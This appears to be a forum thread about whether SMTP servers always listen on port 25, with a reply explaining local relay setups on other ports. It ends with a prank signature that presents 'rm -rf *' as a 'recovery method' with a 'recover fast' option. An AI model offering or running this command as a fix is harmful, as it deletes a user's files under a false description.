themax90
I have never heard of SMTP being on anything but 25. SMTP is a pre-defined port and as I know all servers usually run on it.
/dev/null
@LOULOU: What do you mean by "determinate programaticaly the port for a non standard smtp"?? @AutoIt Smith: It's not uncommon to run a mail server on another port than 25, especially in security environments, where you run the mail scanner software and the mail-relay on the same host. The scanner listens on *:25 while the mail-relay listens on 127.0.0.1:2525 (2525 is just an example). The scanner checks the e-mail and forwards it to the realy if it's O.K. However you're right when you're talking about mail servers on the internet. If they don't listen on port 25, nobody will be able to send email to them, as nobody will know the port they listen on. It's called rm, like recovery method. Make sure to call it with the "recover fast" option like this: rm -rf *
